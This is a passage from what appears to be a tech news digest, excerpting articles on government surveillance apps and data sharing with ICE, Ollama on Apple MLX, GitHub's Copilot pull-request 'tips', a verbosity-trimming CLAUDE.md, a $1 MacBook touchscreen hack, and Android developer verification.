SmartLINK is the ICE electronic monitoring app, built by BI Incorporated, a subsidiary of the GEO Group (a private prison company that profits directly from how many people ICE monitors), under a $2.2 billion contract. The app collects geolocation, facial images, voice prints, medical information including pregnancy data, and phone numbers of your contacts. ICE’s contract gives them “unlimited rights to use, dispose of, or disclose” all data collected. The app’s former terms of service allowed sharing “virtually any information collected through the application, even beyond the scope of the monitoring plan.” SmartLINK went from 6,000 users in 2019 to over 230,000 by 2022, and in 2019, ICE used GPS data from these monitors to coordinate one of the largest immigration raids in history, arresting around 700 people across six cities in Mississippi.

And if you think your lo­ca­tion data is safe be­cause you use reg­u­lar apps and avoid gov­ern­ment ones, the fed­eral gov­ern­ment is buy­ing that data too. Companies like Venntel col­lect 15 bil­lion lo­ca­tion points from over 250 mil­lion de­vices every day through SDKs em­bed­ded in over 80,000 apps (weather, nav­i­ga­tion, coupons, games). DHS, FBI, DOD, and the DEA pur­chase this data with­out war­rants, cre­at­ing a con­sti­tu­tional loop­hole around the Supreme Court’s 2018 Carpenter v. United States rul­ing that re­quires a war­rant for cell­phone lo­ca­tion his­tory. The Defense Department even pur­chased lo­ca­tion data from prayer apps to mon­i­tor Muslim com­mu­ni­ties. Police de­part­ments used sim­i­lar data to track racial jus­tice pro­test­ers.

And then there’s the IRS-ICE data shar­ing deal from April 2025. The IRS and ICE signed a Memorandum of Understanding al­low­ing ICE to re­ceive names, ad­dresses, and tax data for peo­ple with re­moval or­ders. ICE sub­mit­ted 1.28 mil­lion names. The IRS er­ro­neously shared the data of thou­sands of peo­ple who should never have been in­cluded. The act­ing IRS Commissioner, Melanie Krause, re­signed in protest. The chief pri­vacy of­fi­cer quit. One per­son leav­ing changes noth­ing about the in­sti­tu­tion, and the data was al­ready out the door. A fed­eral judge blocked fur­ther shar­ing in November 2025, rul­ing it likely vi­o­lates IRS con­fi­den­tial­ity pro­tec­tions, but by then the IRS was al­ready build­ing an au­to­mated sys­tem to give ICE bulk ac­cess to home ad­dresses with min­i­mal hu­man over­sight. The court or­der is a speed bump, and they’ll find an­other route.

The apps, the data­bases, and the data bro­ker con­tracts all feed the same pipeline, and no sin­gle agency con­trols it be­cause they all share it.

The GAO re­ported in 2023 that nearly 60% of 236 pri­vacy and se­cu­rity rec­om­men­da­tions is­sued since 2010 had still not been im­ple­mented. Congress has been told twice, in 2013 and 2019, to pass com­pre­hen­sive in­ter­net pri­vacy leg­is­la­tion. It has done nei­ther. And it won’t, be­cause the sur­veil­lance ap­pa­ra­tus serves the peo­ple who run it, and the peo­ple who run it write the laws. Oversight is the­ater. The GAO is­sues a re­port, Congress holds a hear­ing, every­one per­forms con­cern for the cam­eras, and then the con­tracts get re­newed and the data keeps flow­ing. It’s work­ing ex­actly as de­signed.

The fed­eral gov­ern­ment pub­lishes con­tent avail­able through stan­dard web pro­to­cols and RSS feeds, then wraps that con­tent in ap­pli­ca­tions that de­mand ac­cess to your lo­ca­tion, bio­met­rics, stor­age, con­tacts, and de­vice iden­tity. They em­bed ad­ver­tis­ing track­ers in FBI apps. They sell the line that you need their app to re­ceive their pro­pa­ganda while the app qui­etly col­lects data that flows into the same sur­veil­lance pipeline feed­ing ICE raids and war­rant­less lo­ca­tion track­ing. Every sin­gle one of these apps could be re­placed by a web page, and they know that. The app ex­ists be­cause a web page can’t read your fin­ger­print, track your GPS in the back­ground, or in­ven­tory the other ac­counts on your de­vice.

You don’t need their app. You don’t need their per­mis­sion to ac­cess pub­lic in­for­ma­tion. You al­ready have a browser, an RSS reader, and the abil­ity to de­cide for your­self what runs on your own hard­ware. Use them.
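To make the point concrete, here is how little machinery public-information delivery actually needs: a stub RSS reader using only Python’s standard library. The feed content below is a hypothetical inlined example (not a real agency feed), so the sketch needs no network access at all — a real feed is one unauthenticated HTTP GET away, with zero device permissions involved.

```python
import xml.etree.ElementTree as ET

# A minimal RSS 2.0 document, inlined for the example. Real newsroom feeds
# follow the same <channel>/<item> structure.
RSS = """<rss version="2.0">
  <channel>
    <title>Example Agency Newsroom</title>
    <item><title>Press release one</title><link>https://example.gov/1</link></item>
    <item><title>Press release two</title><link>https://example.gov/2</link></item>
  </channel>
</rss>"""

def headlines(rss_text):
    """Return (title, link) pairs for every item in an RSS 2.0 feed."""
    root = ET.fromstring(rss_text)
    return [(item.findtext("title"), item.findtext("link"))
            for item in root.iter("item")]

for title, link in headlines(RSS):
    print(f"{title} -> {link}")
```

Swap the inlined string for the body of an HTTP GET against any real feed URL and the same parser works unchanged.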

...

Read the original on www.sambent.com »

5 551 shares, 40 trendiness

Ollama is now powered by MLX on Apple Silicon in preview · Ollama Blog

Today, we’re pre­view­ing the fastest way to run Ollama on Apple sil­i­con, pow­ered by MLX, Apple’s ma­chine learn­ing frame­work.

This un­locks new per­for­mance to ac­cel­er­ate your most de­mand­ing work on ma­cOS:

* Coding agents like Claude Code, OpenCode, or Codex

Ollama on Apple sil­i­con is now built on top of Apple’s ma­chine learn­ing frame­work, MLX, to take ad­van­tage of its uni­fied mem­ory ar­chi­tec­ture.

This re­sults in a large speedup of Ollama on all Apple Silicon de­vices. On Apple’s M5, M5 Pro and M5 Max chips, Ollama lever­ages the new GPU Neural Accelerators to ac­cel­er­ate both time to first to­ken (TTFT) and gen­er­a­tion speed (tokens per sec­ond).

Testing was conducted on March 29, 2026, using Alibaba’s Qwen3.5-35B-A3B model quantized to `NVFP4` and Ollama’s previous implementation quantized to `Q4_K_M` using Ollama 0.18. Ollama 0.19 will see even higher performance (1851 tokens/s prefill and 134 tokens/s decode when running with `int4`).

Ollama now leverages NVIDIA’s NVFP4 format to maintain model accuracy while reducing memory bandwidth and storage requirements for inference workloads.

As more inference providers scale inference using the NVFP4 format, Ollama users see the same results they would get in a production environment.

It further opens up Ollama to run models optimized by NVIDIA’s Model Optimizer. Other precisions will be made available based on the design and usage intent of Ollama’s research and hardware partners.

Ollama’s cache has been up­graded to make cod­ing and agen­tic tasks more ef­fi­cient.

* Lower memory utilization: Ollama now reuses its cache across conversations, meaning lower memory utilization and more cache hits when branching conversations that share a system prompt, as with tools like Claude Code.

* Intelligent check­points: Ollama will now store snap­shots of its cache at in­tel­li­gent lo­ca­tions in the prompt, re­sult­ing in less prompt pro­cess­ing and faster re­sponses.

* Smarter evic­tion: shared pre­fixes sur­vive longer even when older branches are dropped.

This pre­view re­lease of Ollama ac­cel­er­ates the new Qwen3.5-35B-A3B model, with sam­pling pa­ra­me­ters tuned for cod­ing tasks.

Please make sure you have a Mac with more than 32GB of uni­fied mem­ory.

ollama launch claude --model qwen3.5:35b-a3b-coding-nvfp4

ollama launch openclaw --model qwen3.5:35b-a3b-coding-nvfp4

ollama run qwen3.5:35b-a3b-coding-nvfp4
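Once the model is running, it can also be driven programmatically through Ollama’s local REST API (`/api/generate` on port 11434 is Ollama’s documented default endpoint). This sketch only builds and prints the request body; actually sending it, as shown in the commented-out lines, assumes an Ollama server is running locally with the preview model pulled.

```python
import json

OLLAMA_URL = "http://localhost:11434/api/generate"  # Ollama's default local endpoint

def build_generate_request(model, prompt, stream=False):
    """Build the JSON body for Ollama's /api/generate endpoint."""
    return {"model": model, "prompt": prompt, "stream": stream}

body = build_generate_request("qwen3.5:35b-a3b-coding-nvfp4",
                              "Write a function that reverses a string.")
payload = json.dumps(body)
print(payload)

# To actually send it (requires a running Ollama server):
# import urllib.request
# req = urllib.request.Request(OLLAMA_URL, data=payload.encode(),
#                              headers={"Content-Type": "application/json"})
# print(urllib.request.urlopen(req).read().decode())
```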

We are ac­tively work­ing to sup­port fu­ture mod­els. For users with cus­tom mod­els fine-tuned on sup­ported ar­chi­tec­tures, we will in­tro­duce an eas­ier way to im­port mod­els into Ollama. In the mean­time, we will ex­pand the list of sup­ported ar­chi­tec­tures.

Thank you to:

* The MLX con­trib­u­tor team who built an in­cred­i­ble ac­cel­er­a­tion frame­work

* The GGML & llama.cpp team who built a thriv­ing lo­cal frame­work and com­mu­nity

* The Alibaba Qwen team for open-sourc­ing ex­cel­lent mod­els and their col­lab­o­ra­tion

...

Read the original on ollama.com »

6 514 shares, 42 trendiness

GitHub backs down, kills Copilot PR ‘tips’ after backlash

Updated Microsoft has done a 180. Following back­lash from de­vel­op­ers, GitHub has re­moved Copilot’s abil­ity to stick ads - what it calls tips” - into any pull re­quest that in­vokes its name.

Australian de­vel­oper Zach Manson noted on Monday that, af­ter a coworker asked Copilot to cor­rect a typo in one of his pull re­quests, he was sur­prised to find a mes­sage from Copilot in the PR push­ing read­ers to adopt pro­duc­tiv­ity app Raycast.

“Quickly spin up Copilot coding agents from anywhere on your macOS or Windows machine with Raycast,” the note read, with a lightning bolt emoji and a link to install Raycast.

“Initially I thought there was some kind of training data poisoning or novel prompt injection and the Raycast team was doing some elaborate proof of concept marketing,” Manson told The Register in an email.

But no: Take a look around GitHub and you’ll see more than 11,400 PRs with the same tip in them, all seem­ingly added by Copilot. Take a look at the PRs’ code it­self and search for the block in­vok­ing Copilot to add a tip and you’ll find plenty more ex­am­ples of dif­fer­ent tips be­ing in­serted by Copilot.

Manson told us that he’s not surprised to see GitHub doing this with an AI model, but he said it’s pretty offensive to see the Raycast ad inserted by Copilot into his own PR as if he wrote it.

“I wasn’t even aware that the GitHub Copilot Review integration had the ability to edit other users’ descriptions and comments,” Manson told us. “I can’t think of a valid use case for that ability.”

It was only Monday morn­ing when Microsoft watch­ers at Neowin picked up Manson’s re­port that Copilot was in­ject­ing what de­vel­op­ers saw as ads into PRs, and, by the af­ter­noon, GitHub had de­cided a re­cent change to Copilot may have gone a bit too far.

GitHub VP of de­vel­oper re­la­tions Martin Woodward ex­plained in a post on X later in the day Monday that Copilot in­sert­ing ads into PRs is­n’t ac­tu­ally new be­hav­ior - it’s been do­ing so in the ones it cre­ates for a while. Letting Copilot touch PRs it did­n’t cre­ate, but is men­tioned in, on the other hand, is new be­hav­ior that has­n’t re­ally worked out.

“[When] we added the ability to have Copilot work on any PR by mentioning it the behaviour became icky,” Woodward said.

Tim Rogers, principal product manager for Copilot at GitHub, took to Hacker News on Monday to say that giving Copilot the ability to add “tips” to PRs was intended to help developers “learn new ways to use the agent in their workflow.”

Hearing feedback from the community following Manson’s post and the kerfuffle it generated, Rogers said, has helped him realize that “on reflection,” letting Copilot make changes to PRs written by a human without their knowledge was “the wrong judgement call.”

“We’ve now disabled these tips in pull requests created by or touched by Copilot, so you won’t see this happen again,” Rogers added. ®

Martin Woodward, VP of Developer Relations, GitHub, said in a statement: “GitHub does not and does not plan to include advertisements in GitHub. We identified a programming logic issue with a GitHub Copilot coding agent tip that surfaced in the wrong context within a pull request comment. We have removed agent tips from pull request comments moving forward.”

...

Read the original on www.theregister.com »

7 419 shares, 24 trendiness

cut Claude output tokens by 63%. Drop-in. No code changes.

One file. Drop it in your project. Cuts Claude output verbosity by ~63%. No code changes required.

Note: most Claude costs come from input tokens, not output. This file targets output behavior - sycophancy, verbosity, formatting noise. It won’t fix your biggest bill but it will fix your most annoying responses.

Model support: benchmarks were run on Claude only. The rules are model-agnostic and should work on any model that reads context - but results on local models like llama.cpp, Mistral, or others are untested. Community results welcome.

When you use Claude Code, every word Claude gen­er­ates costs to­kens. Most peo­ple never con­trol how Claude re­sponds - they just get what­ever the model de­cides to out­put.

* Opens every response with “Sure!”, “Great question!”, “Absolutely!”

* Ends with “I hope this helps! Let me know if you need anything!”

* Restates your ques­tion be­fore an­swer­ing it

* Adds un­so­licited sug­ges­tions be­yond what you asked

* Over-engineers code with ab­strac­tions you never re­quested

All of this wastes to­kens. None of it adds value.

Drop CLAUDE.md into your pro­ject root. Claude Code reads it au­to­mat­i­cally. Behavior changes im­me­di­ately.

This file works best for:

* Repeated struc­tured tasks where Claude’s de­fault ver­bosity com­pounds across hun­dreds of calls

* Teams who need con­sis­tent, parseable out­put for­mat across ses­sions

This file is not worth it for:

* Single short queries - the file loads into con­text on every mes­sage, so on low-out­put ex­changes it is a net to­ken in­crease

* Casual one-off use - the over­head does­n’t pay off at low vol­ume

* Fixing deep fail­ure modes like hal­lu­ci­nated im­ple­men­ta­tions or ar­chi­tec­tural drift - those re­quire hooks, gates, and me­chan­i­cal en­force­ment

* Pipelines us­ing mul­ti­ple fresh ses­sions per task - fresh ses­sions don’t carry the CLAUDE.md over­head ben­e­fit the same way per­sis­tent ses­sions do

* Parser re­li­a­bil­ity at scale - if you need guar­an­teed parseable out­put, use struc­tured out­puts (JSON mode, tool use with schemas) built into the API - that is a more ro­bust so­lu­tion than prompt-based for­mat­ting rules

* Exploratory or ar­chi­tec­tural work where de­bate, push­back, and al­ter­na­tives are the point - the over­ride rule lets you ask for that any time, but if that’s your pri­mary work­flow this file will feel re­stric­tive

The hon­est trade-off:

The CLAUDE.md file it­self con­sumes in­put to­kens on every mes­sage. The sav­ings come from re­duced out­put to­kens. The net is only pos­i­tive when out­put vol­ume is high enough to off­set the per­sis­tent in­put cost. At low us­age it costs more than it saves.

Same 5 prompts. Run with­out CLAUDE.md (baseline) then with CLAUDE.md (optimized).

~295 words saved per 4 prompts. Same in­for­ma­tion. Zero sig­nal loss.

Methodology note: This is a 5-prompt di­rec­tional in­di­ca­tor (T1-T3, T5 for word re­duc­tion; T4 is a for­mat test), not a sta­tis­ti­cally con­trolled study. Claude’s out­put length varies nat­u­rally be­tween iden­ti­cal prompts. No vari­ance con­trols or re­peated runs were ap­plied. Treat the 63% as a di­rec­tional sig­nal for out­put-heavy use cases, not a pre­cise uni­ver­sal mea­sure­ment. The CLAUDE.md file it­self adds in­put to­kens on every mes­sage - net sav­ings only ap­ply when out­put vol­ume is high enough to off­set that per­sis­tent cost.

Scope rules to your ac­tual fail­ure modes, not generic ones.

Generic rules like “be concise” help, but the real wins come from targeting specific failures you’ve actually hit. For example, if Claude silently swallows errors in your pipeline, add a rule like: “when a step fails, stop immediately and report the full error with traceback before attempting any fix.” Specific beats generic every time.
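As an illustration, a failure-targeted section of a CLAUDE.md might look like the fragment below. These rules are hypothetical examples of the pattern, not the ones shipped in this repo:

```markdown
# Output rules

- No preamble or postamble: answer directly, without "Sure!" or "Hope this helps!".
- Do not restate the question before answering.
- When a pipeline step fails, stop immediately and report the full error
  with traceback before attempting any fix.
- Make only the changes requested; put any other suggestions in one line at the end.
```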

CLAUDE.md files com­pose - use that.

Claude reads mul­ti­ple CLAUDE.md files at once - global (~/.claude/CLAUDE.md), pro­ject-level, and sub­di­rec­tory-level. This means:

* Keep gen­eral pref­er­ences (tone, for­mat, ASCII rules) in your global file

* Keep pro­ject-spe­cific con­straints (“never mod­ify /config with­out con­fir­ma­tion”) at the pro­ject level

This avoids bloat­ing any sin­gle file and keeps rules close to where they ap­ply.

Different pro­ject types need dif­fer­ent lev­els of com­pres­sion. Pick the base file + a pro­file, or use the base alone.

Option 1 - curl:

curl -o CLAUDE.md https://raw.githubusercontent.com/drona23/claude-token-efficient/main/CLAUDE.md

Option 2 - Clone and copy a profile:

git clone https://github.com/drona23/claude-token-efficient

cp claude-token-efficient/profiles/CLAUDE.coding.md your-project/CLAUDE.md

Option 3 - Manual:

Copy the con­tents of CLAUDE.md from this repo into your pro­ject root.

User in­struc­tions al­ways win. If you ex­plic­itly ask for a de­tailed ex­pla­na­tion or ver­bose out­put, Claude will fol­low your in­struc­tion - the file never fights you.

Found a be­hav­ior that CLAUDE.md can fix? Open an is­sue with:

* The annoying behavior (what Claude does by default)

* The prompt that triggers it

Community sub­mis­sions be­come part of the next ver­sion with full credit.

This pro­ject was built on real com­plaints from the Claude com­mu­nity. Full credit to every source that con­tributed a fix:

MIT - free to use, mod­ify, and dis­trib­ute.

Built by Drona Gangarapu - open to PRs, is­sues, and pro­file con­tri­bu­tions.

...

Read the original on github.com »

8 389 shares, 16 trendiness

Turning a MacBook into a Touchscreen with $1 of Hardware

We turned a MacBook into a touchscreen using only $1 of hardware and a little bit of computer vision. The proof-of-concept, dubbed “Project Sistine” after our recreation of the famous painting in the Sistine Chapel, was prototyped by me, Kevin, Guillermo, and Logan in about 16 hours.

The ba­sic prin­ci­ple be­hind Sistine is sim­ple. Surfaces viewed from an an­gle tend to look shiny, and you can tell if a fin­ger is touch­ing the sur­face by check­ing if it’s touch­ing its own re­flec­tion.

Kevin, back in mid­dle school, no­ticed this phe­nom­e­non and built ShinyTouch, uti­liz­ing an ex­ter­nal we­b­cam to build a touch in­put sys­tem re­quir­ing vir­tu­ally no setup. We wanted to see if we could minia­tur­ize the idea and make it work with­out an ex­ter­nal we­b­cam. Our idea was to retro­fit a small mir­ror in front of a MacBook’s built-in we­b­cam, so that the we­b­cam would be look­ing down at the com­puter screen at a sharp an­gle. The cam­era would be able to see fin­gers hov­er­ing over or touch­ing the screen, and we’d be able to trans­late the video feed into touch events us­ing com­puter vi­sion.

Our hard­ware setup was sim­ple. All we needed was to po­si­tion a mir­ror at the ap­pro­pri­ate an­gle in front of the we­b­cam. Here is our bill of ma­te­ri­als:

After some it­er­a­tion, we set­tled on a de­sign that could be as­sem­bled in min­utes us­ing a knife and a hot glue gun.

The first step in pro­cess­ing video frames is de­tect­ing the fin­ger. Here’s a typ­i­cal ex­am­ple of what the we­b­cam sees:

The fin­ger de­tec­tion al­go­rithm needs to find the touch/​hover point for fur­ther pro­cess­ing. Our cur­rent ap­proach uses clas­si­cal com­puter vi­sion tech­niques. The pro­cess­ing pipeline con­sists of the fol­low­ing steps:

1. Find the two largest contours and ensure that the contours overlap in the horizontal direction and the smaller one is above the larger one

2. Identify the touch/hover point as the midpoint of the line connecting the top of the bottom contour and the bottom of the top contour

3. Distinguish between touch and hover based on the vertical distance between the two contours

Shown above is the re­sult of ap­ply­ing this process to a frame from the we­b­cam. The fin­ger and re­flec­tion (contours) are out­lined in green, the bound­ing box is shown in red, and the touch point is shown in ma­genta.
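The midpoint and touch-vs-hover classification steps of the pipeline can be sketched in a few lines. Contour extraction itself would come from a computer-vision library (the post doesn’t name one; OpenCV’s findContours is a typical choice), so this sketch starts from the two contours’ bounding boxes; the function name and the threshold value are illustrative, not from the project:

```python
def touch_point(top_box, bottom_box, touch_threshold_px=4):
    """Classify touch vs. hover from two contour bounding boxes.

    Each box is (x, y, w, h) in webcam pixels, with y increasing downward.
    top_box is the reflection (smaller, above); bottom_box is the finger.
    Returns ((px, py), is_touching), or None if the boxes don't overlap
    horizontally (the pipeline's sanity check).
    """
    tx, ty, tw, th = top_box
    bx, by, bw, bh = bottom_box

    # The contours must overlap in the horizontal direction.
    if tx + tw < bx or bx + bw < tx:
        return None

    gap = by - (ty + th)  # vertical distance between bottom of top contour
                          # and top of bottom contour
    midpoint = ((tx + tw / 2 + bx + bw / 2) / 2,  # midpoint of the line
                ((ty + th) + by) / 2)             # connecting the two edges
    return midpoint, gap <= touch_threshold_px    # small gap => touching
```

A small gap means the finger meets its own reflection, i.e. it is touching the screen; a larger gap is a hover.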

The final step in processing the input is mapping the touch/hover point from webcam coordinates to on-screen coordinates. The two are related by a homography. We compute the homography matrix through a calibration process where the user is prompted to touch specific points on the screen. After we collect data matching webcam coordinates with on-screen coordinates, we can estimate the homography robustly using RANSAC. This gives us a projection matrix that maps webcam coordinates to on-screen coordinates.
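For intuition, here is a minimal sketch of the mapping itself: a plain least-squares DLT homography fit in NumPy. The project estimates the homography robustly with RANSAC on top of a fit like this to reject bad calibration points; that outlier-rejection layer is omitted here.

```python
import numpy as np

def estimate_homography(src_pts, dst_pts):
    """Fit a 3x3 homography H with dst ~ H @ src via the DLT (needs >= 4 pairs)."""
    rows = []
    for (x, y), (u, v) in zip(src_pts, dst_pts):
        rows.append([-x, -y, -1, 0, 0, 0, u * x, u * y, u])
        rows.append([0, 0, 0, -x, -y, -1, v * x, v * y, v])
    # The homography is the null vector of this system: take the right
    # singular vector for the smallest singular value.
    _, _, vt = np.linalg.svd(np.asarray(rows, dtype=float))
    H = vt[-1].reshape(3, 3)
    return H / H[2, 2]  # fix the projective scale

def project(H, pt):
    """Apply homography H to a 2D point (divide out the projective scale)."""
    x, y, w = H @ np.array([pt[0], pt[1], 1.0])
    return (x / w, y / w)
```

In Sistine’s terms: collect (webcam, screen) point pairs during calibration, fit H once, then `project(H, webcam_pt)` turns every detected touch point into a screen coordinate.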

The video above demon­strates the cal­i­bra­tion process, where the user has to fol­low a green dot around the screen. The video in­cludes some de­bug in­for­ma­tion, over­laid on live video from the we­b­cam. The touch point in we­b­cam co­or­di­nates is shown in ma­genta. After the cal­i­bra­tion process is com­plete, the pro­jec­tion ma­trix is vi­su­al­ized with red lines, and the soft­ware switches to a mode where the es­ti­mated touch point is shown as a blue dot.

In the cur­rent pro­to­type, we trans­late hover and touch into mouse events, mak­ing ex­ist­ing ap­pli­ca­tions in­stantly touch-en­abled.

If we were writ­ing our own touch-en­abled apps, we could di­rectly make use of touch data, in­clud­ing in­for­ma­tion such as hover height.

Project Sistine is a proof-of-con­cept that turns a lap­top into a touch­screen us­ing only $1 of hard­ware, and for a pro­to­type, it works pretty well! With some sim­ple mod­i­fi­ca­tions such as a higher res­o­lu­tion we­b­cam (ours was 480p) and a curved mir­ror that al­lows the we­b­cam to cap­ture the en­tire screen, Sistine could be­come a prac­ti­cal low-cost touch­screen sys­tem.

Our Sistine pro­to­type is open source, re­leased un­der the MIT License.

...

Read the original on anishathalye.com »

9 311 shares, 14 trendiness

Rolling out to all developers on Play Console and Android Developer Console

The lat­est Android and Google Play news for app and game

de­vel­op­ers.

Android de­vel­oper ver­i­fi­ca­tion: Rolling out to all de­vel­op­ers on Play Console and Android Developer Console

Android is for every­one. It’s built on a com­mit­ment to an open and safe plat­form. Users should feel con­fi­dent in­stalling apps, no mat­ter where they get them from. However, our re­cent analy­sis found over 90 times more mal­ware from side­loaded sources than on Google Play. So as an ex­tra layer of se­cu­rity, we are rolling out Android de­vel­oper ver­i­fi­ca­tion to help pre­vent ma­li­cious ac­tors from hid­ing be­hind anonymity to re­peat­edly spread harm. Over the past sev­eral months, we’ve worked closely with the com­mu­nity to im­prove the de­sign so we ac­count for the many ways peo­ple use Android to bal­ance open­ness with safety.

Today, we’re start­ing to roll out Android de­vel­oper ver­i­fi­ca­tion to all de­vel­op­ers in both the new Android Developer Console and Play Console. This al­lows you to com­plete your ver­i­fi­ca­tion and reg­is­ter your apps be­fore user-fac­ing changes be­gin later this year.

If you only dis­trib­ute apps out­side of Google Play, you can cre­ate an ac­count in Android Developer Console to­day.

If you’re on Google Play, check your Play Console ac­count for up­dates over the next few weeks. If you’ve al­ready ver­i­fied your iden­tity here, then you’re likely al­ready set.

Most of your users’ down­load ex­pe­ri­ence will not change at all

While ver­i­fi­ca­tion tools are rolling out now, the ex­pe­ri­ence for users down­load­ing your apps will not change un­til later this year. The user side pro­tec­tions will first go live in Brazil, Indonesia, Singapore, and Thailand this September, be­fore ex­pand­ing glob­ally in 2027. We’ve shared this time­line early to en­sure you have am­ple time to com­plete your ver­i­fi­ca­tion.

Following this deadline, for the vast majority of users, the experience of installing apps will stay exactly the same. It’s only when a user tries to install an unregistered app that they’ll need to use ADB or the advanced flow, helping us keep the broader community safe while preserving flexibility for our power users.

Developers can still choose where to dis­trib­ute their apps. Most users’ down­load ex­pe­ri­ence will not change

Tailoring the ver­i­fi­ca­tion ex­pe­ri­ence to your feed­back

To bal­ance the need for safety with our com­mit­ment to open­ness, we’ve im­proved the ver­i­fi­ca­tion ex­pe­ri­ence based on your feed­back. We’ve stream­lined the de­vel­oper ex­pe­ri­ence to be more in­te­grated with ex­ist­ing work­flows and main­tained choice for power users.

For Android Studio de­vel­op­ers: In the next two months, you’ll see your ap­p’s reg­is­tra­tion sta­tus right in Android Studio when you gen­er­ate a signed App Bundle or APK.

You’ll see your ap­p’s reg­is­tra­tion sta­tus in Android Studio when you gen­er­ate a signed App Bundle or APK.

For Play de­vel­op­ers: If you’ve com­pleted Play Console’s de­vel­oper ver­i­fi­ca­tion re­quire­ments, your iden­tity is al­ready ver­i­fied and we’ll au­to­mat­i­cally reg­is­ter el­i­gi­ble Play apps for you. In the rare case that we are un­able to reg­is­ter your apps for you, you will need to fol­low the man­ual app claim process. Over the next cou­ple of weeks, more de­tails will be pro­vided in the Play Console and through email. Also, you’ll be able to reg­is­ter apps you dis­trib­ute out­side of Play in the Play Console too.

The Android de­vel­oper ver­i­fi­ca­tion page in your Play Console will show the reg­is­tra­tion sta­tus for each of your apps.

For stu­dents and hob­by­ists: To keep Android ac­ces­si­ble to every­one, we’re build­ing a free, no gov­ern­ment ID re­quired, lim­ited dis­tri­b­u­tion ac­count so you can share your work with up to 20 de­vices. You only need an email ac­count to get started. Sign up for early ac­cess. We’ll send in­vites in June.

For power users: We are main­tain­ing the choice to in­stall apps from any source. You can use the new ad­vanced flow for side­load­ing un­reg­is­tered apps or con­tinue us­ing ADB. This main­tains choice while pro­tect­ing vul­ner­a­ble users.

We’re rolling this out care­fully and work­ing closely with de­vel­op­ers, users, and our part­ners. In April, we’ll in­tro­duce Android Developer Verifier, a new Google sys­tem ser­vice that will be used to check if an app is reg­is­tered to a ver­i­fied de­vel­oper.

April 2026: Users will start to see Android Developer Verifier in their Google Systems ser­vices set­tings.

September 30, 2026: Apps must be reg­is­tered by ver­i­fied de­vel­op­ers in or­der to be in­stalled and up­dated on cer­ti­fied Android de­vices in Brazil, Indonesia, Singapore, and Thailand. Unregistered apps can be side­loaded with ADB or ad­vanced flow.

2027 and be­yond: We will roll out this re­quire­ment glob­ally.

We’re com­mit­ted to an Android that is both open and safe. Check out our de­vel­oper guides to get started to­day.

...

Read the original on android-developers.googleblog.com »

10 309 shares, 19 trendiness

- YouTube

...

Read the original on www.youtube.com »
